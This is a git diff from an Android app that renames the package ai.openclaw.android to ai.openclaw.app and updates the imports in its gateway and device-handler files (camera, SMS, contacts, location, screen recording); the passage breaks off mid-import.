b/apps/android/app/src/main/java/ai/openclaw/app/gateway/GatewayDiscovery.kt similarity index 99% rename from apps/android/app/src/main/java/ai/openclaw/android/gateway/GatewayDiscovery.kt rename to apps/android/app/src/main/java/ai/openclaw/app/gateway/GatewayDiscovery.kt index 2ad8ec0cb19..f83af46cc65 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/gateway/GatewayDiscovery.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/gateway/GatewayDiscovery.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.gateway +package ai.openclaw.app.gateway import android.content.Context import android.net.ConnectivityManager diff --git a/apps/android/app/src/main/java/ai/openclaw/android/gateway/GatewayEndpoint.kt b/apps/android/app/src/main/java/ai/openclaw/app/gateway/GatewayEndpoint.kt similarity index 94% rename from apps/android/app/src/main/java/ai/openclaw/android/gateway/GatewayEndpoint.kt rename to apps/android/app/src/main/java/ai/openclaw/app/gateway/GatewayEndpoint.kt index 9a301060282..0903ddaa93f 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/gateway/GatewayEndpoint.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/gateway/GatewayEndpoint.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.gateway +package ai.openclaw.app.gateway data class GatewayEndpoint( val stableId: String, diff --git a/apps/android/app/src/main/java/ai/openclaw/android/gateway/GatewayProtocol.kt b/apps/android/app/src/main/java/ai/openclaw/app/gateway/GatewayProtocol.kt similarity index 52% rename from apps/android/app/src/main/java/ai/openclaw/android/gateway/GatewayProtocol.kt rename to apps/android/app/src/main/java/ai/openclaw/app/gateway/GatewayProtocol.kt index da8fa4c6933..27b4566ac93 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/gateway/GatewayProtocol.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/gateway/GatewayProtocol.kt @@ -1,3 +1,3 @@ -package ai.openclaw.android.gateway +package ai.openclaw.app.gateway const val GATEWAY_PROTOCOL_VERSION = 3 diff --git a/apps/android/app/src/main/java/ai/openclaw/android/gateway/GatewaySession.kt b/apps/android/app/src/main/java/ai/openclaw/app/gateway/GatewaySession.kt similarity index 99% rename from apps/android/app/src/main/java/ai/openclaw/android/gateway/GatewaySession.kt rename to apps/android/app/src/main/java/ai/openclaw/app/gateway/GatewaySession.kt index 6f30f072ef8..aee47eaada8 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/gateway/GatewaySession.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/gateway/GatewaySession.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.gateway +package ai.openclaw.app.gateway import android.util.Log import java.util.Locale diff --git a/apps/android/app/src/main/java/ai/openclaw/android/gateway/GatewayTls.kt b/apps/android/app/src/main/java/ai/openclaw/app/gateway/GatewayTls.kt similarity index 99% rename from apps/android/app/src/main/java/ai/openclaw/android/gateway/GatewayTls.kt rename to apps/android/app/src/main/java/ai/openclaw/app/gateway/GatewayTls.kt index 0726c94fc97..20e71cc364a 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/gateway/GatewayTls.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/gateway/GatewayTls.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.gateway +package ai.openclaw.app.gateway import android.annotation.SuppressLint import kotlinx.coroutines.Dispatchers diff --git a/apps/android/app/src/main/java/ai/openclaw/android/gateway/InvokeErrorParser.kt b/apps/android/app/src/main/java/ai/openclaw/app/gateway/InvokeErrorParser.kt similarity index 96% rename from apps/android/app/src/main/java/ai/openclaw/android/gateway/InvokeErrorParser.kt rename to apps/android/app/src/main/java/ai/openclaw/app/gateway/InvokeErrorParser.kt index 7242f4a5533..dae516a901c 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/gateway/InvokeErrorParser.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/gateway/InvokeErrorParser.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.gateway +package ai.openclaw.app.gateway data class ParsedInvokeError( val code: String, diff --git a/apps/android/app/src/main/java/ai/openclaw/android/node/A2UIHandler.kt b/apps/android/app/src/main/java/ai/openclaw/app/node/A2UIHandler.kt similarity index 98% rename from apps/android/app/src/main/java/ai/openclaw/android/node/A2UIHandler.kt rename to apps/android/app/src/main/java/ai/openclaw/app/node/A2UIHandler.kt index 4e7ee32b996..1938cf308dd 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/node/A2UIHandler.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/node/A2UIHandler.kt @@ -1,6 +1,6 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node -import ai.openclaw.android.gateway.GatewaySession +import ai.openclaw.app.gateway.GatewaySession import kotlinx.coroutines.delay import kotlinx.serialization.json.Json import kotlinx.serialization.json.JsonArray diff --git a/apps/android/app/src/main/java/ai/openclaw/android/node/AppUpdateHandler.kt b/apps/android/app/src/main/java/ai/openclaw/app/node/AppUpdateHandler.kt similarity index 98% rename from apps/android/app/src/main/java/ai/openclaw/android/node/AppUpdateHandler.kt rename to apps/android/app/src/main/java/ai/openclaw/app/node/AppUpdateHandler.kt index e54c846c0fb..f314d3330dc 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/node/AppUpdateHandler.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/node/AppUpdateHandler.kt @@ -1,12 +1,12 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node import android.app.PendingIntent import android.content.Context import android.content.Intent -import ai.openclaw.android.InstallResultReceiver -import ai.openclaw.android.MainActivity -import ai.openclaw.android.gateway.GatewayEndpoint -import ai.openclaw.android.gateway.GatewaySession +import ai.openclaw.app.InstallResultReceiver +import ai.openclaw.app.MainActivity +import ai.openclaw.app.gateway.GatewayEndpoint +import ai.openclaw.app.gateway.GatewaySession import java.io.File import java.net.URI import java.security.MessageDigest diff --git a/apps/android/app/src/main/java/ai/openclaw/android/node/CalendarHandler.kt b/apps/android/app/src/main/java/ai/openclaw/app/node/CalendarHandler.kt similarity index 99% rename from apps/android/app/src/main/java/ai/openclaw/android/node/CalendarHandler.kt rename to apps/android/app/src/main/java/ai/openclaw/app/node/CalendarHandler.kt index 357aed3b297..63563919e18 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/node/CalendarHandler.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/node/CalendarHandler.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node import android.Manifest import android.content.ContentResolver @@ -7,7 +7,7 @@ import android.content.ContentValues import android.content.Context import android.provider.CalendarContract import androidx.core.content.ContextCompat -import ai.openclaw.android.gateway.GatewaySession +import ai.openclaw.app.gateway.GatewaySession import java.time.Instant import java.time.temporal.ChronoUnit import java.util.TimeZone diff --git a/apps/android/app/src/main/java/ai/openclaw/android/node/CameraCaptureManager.kt b/apps/android/app/src/main/java/ai/openclaw/app/node/CameraCaptureManager.kt similarity index 99% rename from apps/android/app/src/main/java/ai/openclaw/android/node/CameraCaptureManager.kt rename to apps/android/app/src/main/java/ai/openclaw/app/node/CameraCaptureManager.kt index 67241ef2ef7..a942c0baa70 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/node/CameraCaptureManager.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/node/CameraCaptureManager.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node import android.Manifest import android.annotation.SuppressLint @@ -28,7 +28,7 @@ import androidx.camera.video.VideoRecordEvent import androidx.core.content.ContextCompat import androidx.core.content.ContextCompat.checkSelfPermission import androidx.core.graphics.scale -import ai.openclaw.android.PermissionRequester +import ai.openclaw.app.PermissionRequester import kotlinx.coroutines.Dispatchers import kotlinx.coroutines.suspendCancellableCoroutine import kotlinx.coroutines.withTimeout diff --git a/apps/android/app/src/main/java/ai/openclaw/android/node/CameraHandler.kt b/apps/android/app/src/main/java/ai/openclaw/app/node/CameraHandler.kt similarity index 97% rename from apps/android/app/src/main/java/ai/openclaw/android/node/CameraHandler.kt rename to apps/android/app/src/main/java/ai/openclaw/app/node/CameraHandler.kt index 0ee22849a62..3e7881f2625 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/node/CameraHandler.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/node/CameraHandler.kt @@ -1,9 +1,9 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node import android.content.Context -import ai.openclaw.android.CameraHudKind -import ai.openclaw.android.BuildConfig -import ai.openclaw.android.gateway.GatewaySession +import ai.openclaw.app.CameraHudKind +import ai.openclaw.app.BuildConfig +import ai.openclaw.app.gateway.GatewaySession import kotlinx.coroutines.Dispatchers import kotlinx.coroutines.flow.MutableStateFlow import kotlinx.coroutines.withContext diff --git a/apps/android/app/src/main/java/ai/openclaw/android/node/CanvasController.kt b/apps/android/app/src/main/java/ai/openclaw/app/node/CanvasController.kt similarity index 99% rename from apps/android/app/src/main/java/ai/openclaw/android/node/CanvasController.kt rename to apps/android/app/src/main/java/ai/openclaw/app/node/CanvasController.kt index a051bb91c3b..9efb2a924d7 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/node/CanvasController.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/node/CanvasController.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node import android.graphics.Bitmap import android.graphics.Canvas @@ -20,7 +20,7 @@ import kotlinx.serialization.json.Json import kotlinx.serialization.json.JsonElement import kotlinx.serialization.json.JsonObject import kotlinx.serialization.json.JsonPrimitive -import ai.openclaw.android.BuildConfig +import ai.openclaw.app.BuildConfig import kotlin.coroutines.resume class CanvasController { diff --git a/apps/android/app/src/main/java/ai/openclaw/android/node/ConnectionManager.kt b/apps/android/app/src/main/java/ai/openclaw/app/node/ConnectionManager.kt similarity index 92% rename from apps/android/app/src/main/java/ai/openclaw/android/node/ConnectionManager.kt rename to apps/android/app/src/main/java/ai/openclaw/app/node/ConnectionManager.kt index 021c5fe2ce6..d1593f4829a 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/node/ConnectionManager.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/node/ConnectionManager.kt @@ -1,14 +1,14 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node import android.os.Build -import ai.openclaw.android.BuildConfig -import ai.openclaw.android.SecurePrefs -import ai.openclaw.android.gateway.GatewayClientInfo -import ai.openclaw.android.gateway.GatewayConnectOptions -import ai.openclaw.android.gateway.GatewayEndpoint -import ai.openclaw.android.gateway.GatewayTlsParams -import ai.openclaw.android.LocationMode -import ai.openclaw.android.VoiceWakeMode +import ai.openclaw.app.BuildConfig +import ai.openclaw.app.SecurePrefs +import ai.openclaw.app.gateway.GatewayClientInfo +import ai.openclaw.app.gateway.GatewayConnectOptions +import ai.openclaw.app.gateway.GatewayEndpoint +import ai.openclaw.app.gateway.GatewayTlsParams +import ai.openclaw.app.LocationMode +import ai.openclaw.app.VoiceWakeMode class ConnectionManager( private val prefs: SecurePrefs, diff --git a/apps/android/app/src/main/java/ai/openclaw/android/node/ContactsHandler.kt b/apps/android/app/src/main/java/ai/openclaw/app/node/ContactsHandler.kt similarity index 99% rename from apps/android/app/src/main/java/ai/openclaw/android/node/ContactsHandler.kt rename to apps/android/app/src/main/java/ai/openclaw/app/node/ContactsHandler.kt index 2f706b7a6b2..f203b044a7c 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/node/ContactsHandler.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/node/ContactsHandler.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node import android.Manifest import android.content.ContentProviderOperation @@ -7,7 +7,7 @@ import android.content.ContentValues import android.content.Context import android.provider.ContactsContract import androidx.core.content.ContextCompat -import ai.openclaw.android.gateway.GatewaySession +import ai.openclaw.app.gateway.GatewaySession import kotlinx.serialization.json.Json import kotlinx.serialization.json.JsonArray import kotlinx.serialization.json.JsonObject diff --git a/apps/android/app/src/main/java/ai/openclaw/android/node/DebugHandler.kt b/apps/android/app/src/main/java/ai/openclaw/app/node/DebugHandler.kt similarity index 96% rename from apps/android/app/src/main/java/ai/openclaw/android/node/DebugHandler.kt rename to apps/android/app/src/main/java/ai/openclaw/app/node/DebugHandler.kt index 2b0fc04e437..283d898b4f3 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/node/DebugHandler.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/node/DebugHandler.kt @@ -1,9 +1,9 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node import android.content.Context -import ai.openclaw.android.BuildConfig -import ai.openclaw.android.gateway.DeviceIdentityStore -import ai.openclaw.android.gateway.GatewaySession +import ai.openclaw.app.BuildConfig +import ai.openclaw.app.gateway.DeviceIdentityStore +import ai.openclaw.app.gateway.GatewaySession import kotlinx.serialization.json.JsonPrimitive class DebugHandler( diff --git a/apps/android/app/src/main/java/ai/openclaw/android/node/DeviceHandler.kt b/apps/android/app/src/main/java/ai/openclaw/app/node/DeviceHandler.kt similarity index 99% rename from apps/android/app/src/main/java/ai/openclaw/android/node/DeviceHandler.kt rename to apps/android/app/src/main/java/ai/openclaw/app/node/DeviceHandler.kt index 4c7045b4608..a19890285a8 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/node/DeviceHandler.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/node/DeviceHandler.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node import android.Manifest import android.app.ActivityManager @@ -15,8 +15,8 @@ import android.os.PowerManager import android.os.StatFs import android.os.SystemClock import androidx.core.content.ContextCompat -import ai.openclaw.android.BuildConfig -import ai.openclaw.android.gateway.GatewaySession +import ai.openclaw.app.BuildConfig +import ai.openclaw.app.gateway.GatewaySession import java.util.Locale import kotlinx.serialization.json.JsonPrimitive import kotlinx.serialization.json.buildJsonArray diff --git a/apps/android/app/src/main/java/ai/openclaw/android/node/DeviceNotificationListenerService.kt b/apps/android/app/src/main/java/ai/openclaw/app/node/DeviceNotificationListenerService.kt similarity index 99% rename from apps/android/app/src/main/java/ai/openclaw/android/node/DeviceNotificationListenerService.kt rename to apps/android/app/src/main/java/ai/openclaw/app/node/DeviceNotificationListenerService.kt index 30522b6d755..1e9dc0408f6 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/node/DeviceNotificationListenerService.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/node/DeviceNotificationListenerService.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node import android.app.Notification import android.app.NotificationManager diff --git a/apps/android/app/src/main/java/ai/openclaw/android/node/GatewayEventHandler.kt b/apps/android/app/src/main/java/ai/openclaw/app/node/GatewayEventHandler.kt similarity index 94% rename from apps/android/app/src/main/java/ai/openclaw/android/node/GatewayEventHandler.kt rename to apps/android/app/src/main/java/ai/openclaw/app/node/GatewayEventHandler.kt index 9c0514d8635..ebfd01b9253 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/node/GatewayEventHandler.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/node/GatewayEventHandler.kt @@ -1,7 +1,7 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node -import ai.openclaw.android.SecurePrefs -import ai.openclaw.android.gateway.GatewaySession +import ai.openclaw.app.SecurePrefs +import ai.openclaw.app.gateway.GatewaySession import kotlinx.coroutines.CoroutineScope import kotlinx.coroutines.Job import kotlinx.coroutines.delay diff --git a/apps/android/app/src/main/java/ai/openclaw/android/node/InvokeCommandRegistry.kt b/apps/android/app/src/main/java/ai/openclaw/app/node/InvokeCommandRegistry.kt similarity index 89% rename from apps/android/app/src/main/java/ai/openclaw/android/node/InvokeCommandRegistry.kt rename to apps/android/app/src/main/java/ai/openclaw/app/node/InvokeCommandRegistry.kt index b8ec77bfca9..9f7ee1a890a 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/node/InvokeCommandRegistry.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/node/InvokeCommandRegistry.kt @@ -1,19 +1,19 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node -import ai.openclaw.android.protocol.OpenClawCalendarCommand -import ai.openclaw.android.protocol.OpenClawCanvasA2UICommand -import ai.openclaw.android.protocol.OpenClawCanvasCommand -import ai.openclaw.android.protocol.OpenClawCameraCommand -import ai.openclaw.android.protocol.OpenClawCapability -import ai.openclaw.android.protocol.OpenClawContactsCommand -import ai.openclaw.android.protocol.OpenClawDeviceCommand -import ai.openclaw.android.protocol.OpenClawLocationCommand -import ai.openclaw.android.protocol.OpenClawMotionCommand -import ai.openclaw.android.protocol.OpenClawNotificationsCommand -import ai.openclaw.android.protocol.OpenClawPhotosCommand -import ai.openclaw.android.protocol.OpenClawScreenCommand -import ai.openclaw.android.protocol.OpenClawSmsCommand -import ai.openclaw.android.protocol.OpenClawSystemCommand +import ai.openclaw.app.protocol.OpenClawCalendarCommand +import ai.openclaw.app.protocol.OpenClawCanvasA2UICommand +import ai.openclaw.app.protocol.OpenClawCanvasCommand +import ai.openclaw.app.protocol.OpenClawCameraCommand +import ai.openclaw.app.protocol.OpenClawCapability +import ai.openclaw.app.protocol.OpenClawContactsCommand +import ai.openclaw.app.protocol.OpenClawDeviceCommand +import ai.openclaw.app.protocol.OpenClawLocationCommand +import ai.openclaw.app.protocol.OpenClawMotionCommand +import ai.openclaw.app.protocol.OpenClawNotificationsCommand +import ai.openclaw.app.protocol.OpenClawPhotosCommand +import ai.openclaw.app.protocol.OpenClawScreenCommand +import ai.openclaw.app.protocol.OpenClawSmsCommand +import ai.openclaw.app.protocol.OpenClawSystemCommand data class NodeRuntimeFlags( val cameraEnabled: Boolean, diff --git a/apps/android/app/src/main/java/ai/openclaw/android/node/InvokeDispatcher.kt b/apps/android/app/src/main/java/ai/openclaw/app/node/InvokeDispatcher.kt similarity index 91% rename from apps/android/app/src/main/java/ai/openclaw/android/node/InvokeDispatcher.kt rename to apps/android/app/src/main/java/ai/openclaw/app/node/InvokeDispatcher.kt index 36b89eb2ec8..dc6eed7438d 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/node/InvokeDispatcher.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/node/InvokeDispatcher.kt @@ -1,18 +1,18 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node -import ai.openclaw.android.gateway.GatewaySession -import ai.openclaw.android.protocol.OpenClawCalendarCommand -import ai.openclaw.android.protocol.OpenClawCanvasA2UICommand -import ai.openclaw.android.protocol.OpenClawCanvasCommand -import ai.openclaw.android.protocol.OpenClawCameraCommand -import ai.openclaw.android.protocol.OpenClawContactsCommand -import ai.openclaw.android.protocol.OpenClawDeviceCommand -import ai.openclaw.android.protocol.OpenClawLocationCommand -import ai.openclaw.android.protocol.OpenClawMotionCommand -import ai.openclaw.android.protocol.OpenClawNotificationsCommand -import ai.openclaw.android.protocol.OpenClawScreenCommand -import ai.openclaw.android.protocol.OpenClawSmsCommand -import ai.openclaw.android.protocol.OpenClawSystemCommand +import ai.openclaw.app.gateway.GatewaySession +import ai.openclaw.app.protocol.OpenClawCalendarCommand +import ai.openclaw.app.protocol.OpenClawCanvasA2UICommand +import ai.openclaw.app.protocol.OpenClawCanvasCommand +import ai.openclaw.app.protocol.OpenClawCameraCommand +import ai.openclaw.app.protocol.OpenClawContactsCommand +import ai.openclaw.app.protocol.OpenClawDeviceCommand +import ai.openclaw.app.protocol.OpenClawLocationCommand +import ai.openclaw.app.protocol.OpenClawMotionCommand +import ai.openclaw.app.protocol.OpenClawNotificationsCommand +import ai.openclaw.app.protocol.OpenClawScreenCommand +import ai.openclaw.app.protocol.OpenClawSmsCommand +import ai.openclaw.app.protocol.OpenClawSystemCommand class InvokeDispatcher( private val canvas: CanvasController, @@ -145,7 +145,7 @@ class InvokeDispatcher( OpenClawSystemCommand.Notify.rawValue -> systemHandler.handleSystemNotify(paramsJson) // Photos command - ai.openclaw.android.protocol.OpenClawPhotosCommand.Latest.rawValue -> photosHandler.handlePhotosLatest( + ai.openclaw.app.protocol.OpenClawPhotosCommand.Latest.rawValue -> photosHandler.handlePhotosLatest( paramsJson, ) diff --git a/apps/android/app/src/main/java/ai/openclaw/android/node/JpegSizeLimiter.kt b/apps/android/app/src/main/java/ai/openclaw/app/node/JpegSizeLimiter.kt similarity index 98% rename from apps/android/app/src/main/java/ai/openclaw/android/node/JpegSizeLimiter.kt rename to apps/android/app/src/main/java/ai/openclaw/app/node/JpegSizeLimiter.kt index d6018467e66..143a1292f2c 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/node/JpegSizeLimiter.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/node/JpegSizeLimiter.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node import kotlin.math.max import kotlin.math.min diff --git a/apps/android/app/src/main/java/ai/openclaw/android/node/LocationCaptureManager.kt b/apps/android/app/src/main/java/ai/openclaw/app/node/LocationCaptureManager.kt similarity index 99% rename from apps/android/app/src/main/java/ai/openclaw/android/node/LocationCaptureManager.kt rename to apps/android/app/src/main/java/ai/openclaw/app/node/LocationCaptureManager.kt index 87762e87fa9..86b059c243d 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/node/LocationCaptureManager.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/node/LocationCaptureManager.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node import android.Manifest import android.content.Context diff --git a/apps/android/app/src/main/java/ai/openclaw/android/node/LocationHandler.kt b/apps/android/app/src/main/java/ai/openclaw/app/node/LocationHandler.kt similarity index 97% rename from apps/android/app/src/main/java/ai/openclaw/android/node/LocationHandler.kt rename to apps/android/app/src/main/java/ai/openclaw/app/node/LocationHandler.kt index c3f292f97a5..d925fd7eba7 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/node/LocationHandler.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/node/LocationHandler.kt @@ -1,12 +1,12 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node import android.Manifest import android.content.Context import android.content.pm.PackageManager import android.location.LocationManager import androidx.core.content.ContextCompat -import ai.openclaw.android.LocationMode -import ai.openclaw.android.gateway.GatewaySession +import ai.openclaw.app.LocationMode +import ai.openclaw.app.gateway.GatewaySession import kotlinx.coroutines.TimeoutCancellationException import kotlinx.serialization.json.Json import kotlinx.serialization.json.JsonObject diff --git a/apps/android/app/src/main/java/ai/openclaw/android/node/MotionHandler.kt b/apps/android/app/src/main/java/ai/openclaw/app/node/MotionHandler.kt similarity index 99% rename from apps/android/app/src/main/java/ai/openclaw/android/node/MotionHandler.kt rename to apps/android/app/src/main/java/ai/openclaw/app/node/MotionHandler.kt index 52658f8efb6..bb11d6409ba 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/node/MotionHandler.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/node/MotionHandler.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node import android.Manifest import android.content.Context @@ -8,7 +8,7 @@ import android.hardware.SensorEventListener import android.hardware.SensorManager import android.os.SystemClock import androidx.core.content.ContextCompat -import ai.openclaw.android.gateway.GatewaySession +import ai.openclaw.app.gateway.GatewaySession import java.time.Instant import kotlinx.coroutines.suspendCancellableCoroutine import kotlinx.coroutines.withTimeoutOrNull diff --git a/apps/android/app/src/main/java/ai/openclaw/android/node/NodeUtils.kt b/apps/android/app/src/main/java/ai/openclaw/app/node/NodeUtils.kt similarity index 96% rename from apps/android/app/src/main/java/ai/openclaw/android/node/NodeUtils.kt rename to apps/android/app/src/main/java/ai/openclaw/app/node/NodeUtils.kt index 5ba58c23860..587133d2a2c 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/node/NodeUtils.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/node/NodeUtils.kt @@ -1,6 +1,6 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node -import ai.openclaw.android.gateway.parseInvokeErrorFromThrowable +import ai.openclaw.app.gateway.parseInvokeErrorFromThrowable import kotlinx.serialization.json.Json import kotlinx.serialization.json.JsonElement import kotlinx.serialization.json.JsonNull diff --git a/apps/android/app/src/main/java/ai/openclaw/android/node/NotificationsHandler.kt b/apps/android/app/src/main/java/ai/openclaw/app/node/NotificationsHandler.kt similarity index 98% rename from apps/android/app/src/main/java/ai/openclaw/android/node/NotificationsHandler.kt rename to apps/android/app/src/main/java/ai/openclaw/app/node/NotificationsHandler.kt index 755b20513b4..d6a1f9998cb 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/node/NotificationsHandler.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/node/NotificationsHandler.kt @@ -1,7 +1,7 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node import android.content.Context -import ai.openclaw.android.gateway.GatewaySession +import ai.openclaw.app.gateway.GatewaySession import kotlinx.serialization.json.Json import kotlinx.serialization.json.JsonArray import kotlinx.serialization.json.JsonObject diff --git a/apps/android/app/src/main/java/ai/openclaw/android/node/PhotosHandler.kt b/apps/android/app/src/main/java/ai/openclaw/app/node/PhotosHandler.kt similarity index 99% rename from apps/android/app/src/main/java/ai/openclaw/android/node/PhotosHandler.kt rename to apps/android/app/src/main/java/ai/openclaw/app/node/PhotosHandler.kt index e7f3debff06..ee05bda95a7 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/node/PhotosHandler.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/node/PhotosHandler.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node import android.Manifest import android.content.ContentResolver @@ -12,7 +12,7 @@ import android.os.Bundle import android.provider.MediaStore import androidx.core.content.ContextCompat import androidx.core.graphics.scale -import ai.openclaw.android.gateway.GatewaySession +import ai.openclaw.app.gateway.GatewaySession import java.io.ByteArrayOutputStream import java.time.Instant import kotlin.math.max diff --git a/apps/android/app/src/main/java/ai/openclaw/android/node/ScreenHandler.kt b/apps/android/app/src/main/java/ai/openclaw/app/node/ScreenHandler.kt similarity index 89% rename from apps/android/app/src/main/java/ai/openclaw/android/node/ScreenHandler.kt rename to apps/android/app/src/main/java/ai/openclaw/app/node/ScreenHandler.kt index c63d73f5e52..ebbe6f415d6 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/node/ScreenHandler.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/node/ScreenHandler.kt @@ -1,6 +1,6 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node -import ai.openclaw.android.gateway.GatewaySession +import ai.openclaw.app.gateway.GatewaySession class ScreenHandler( private val screenRecorder: ScreenRecordManager, diff --git a/apps/android/app/src/main/java/ai/openclaw/android/node/ScreenRecordManager.kt b/apps/android/app/src/main/java/ai/openclaw/app/node/ScreenRecordManager.kt similarity index 95% rename from apps/android/app/src/main/java/ai/openclaw/android/node/ScreenRecordManager.kt rename to apps/android/app/src/main/java/ai/openclaw/app/node/ScreenRecordManager.kt index bb06d1200e4..bae5587c4cc 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/node/ScreenRecordManager.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/node/ScreenRecordManager.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node import android.content.Context import android.hardware.display.DisplayManager @@ -6,7 +6,7 @@ import android.media.MediaRecorder import android.media.projection.MediaProjectionManager import android.os.Build import android.util.Base64 -import ai.openclaw.android.ScreenCaptureRequester +import ai.openclaw.app.ScreenCaptureRequester import kotlinx.coroutines.Dispatchers import kotlinx.coroutines.delay import kotlinx.coroutines.withContext @@ -18,13 +18,13 @@ class ScreenRecordManager(private val context: Context) { data class Payload(val payloadJson: String) @Volatile private var screenCaptureRequester: ScreenCaptureRequester? = null - @Volatile private var permissionRequester: ai.openclaw.android.PermissionRequester? = null + @Volatile private var permissionRequester: ai.openclaw.app.PermissionRequester? = null fun attachScreenCaptureRequester(requester: ScreenCaptureRequester) { screenCaptureRequester = requester } - fun attachPermissionRequester(requester: ai.openclaw.android.PermissionRequester) { + fun attachPermissionRequester(requester: ai.openclaw.app.PermissionRequester) { permissionRequester = requester } diff --git a/apps/android/app/src/main/java/ai/openclaw/android/node/SmsHandler.kt b/apps/android/app/src/main/java/ai/openclaw/app/node/SmsHandler.kt similarity index 86% rename from apps/android/app/src/main/java/ai/openclaw/android/node/SmsHandler.kt rename to apps/android/app/src/main/java/ai/openclaw/app/node/SmsHandler.kt index 30b7781009d..0c76ac24587 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/node/SmsHandler.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/node/SmsHandler.kt @@ -1,6 +1,6 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node -import ai.openclaw.android.gateway.GatewaySession +import ai.openclaw.app.gateway.GatewaySession class SmsHandler( private val sms: SmsManager, diff --git a/apps/android/app/src/main/java/ai/openclaw/android/node/SmsManager.kt b/apps/android/app/src/main/java/ai/openclaw/app/node/SmsManager.kt similarity index 98% rename from apps/android/app/src/main/java/ai/openclaw/android/node/SmsManager.kt rename to apps/android/app/src/main/java/ai/openclaw/app/node/SmsManager.kt index d727bfd2763..3c5184b0247 100644 --- a/apps/android/app/src/main/java/ai/openclaw/android/node/SmsManager.kt +++ b/apps/android/app/src/main/java/ai/openclaw/app/node/SmsManager.kt @@ -1,4 +1,4 @@ -package ai.openclaw.android.node +package ai.openclaw.app.node import android.Manifest import android.content.Context @@ -11,7 +11,7 @@ import kotlinx.serialization.json.JsonObject import kotlinx.serialization.json.JsonPrimitive import kotlinx.serialization.json.jsonObject import kotlinx.serialization.encodeToString -import 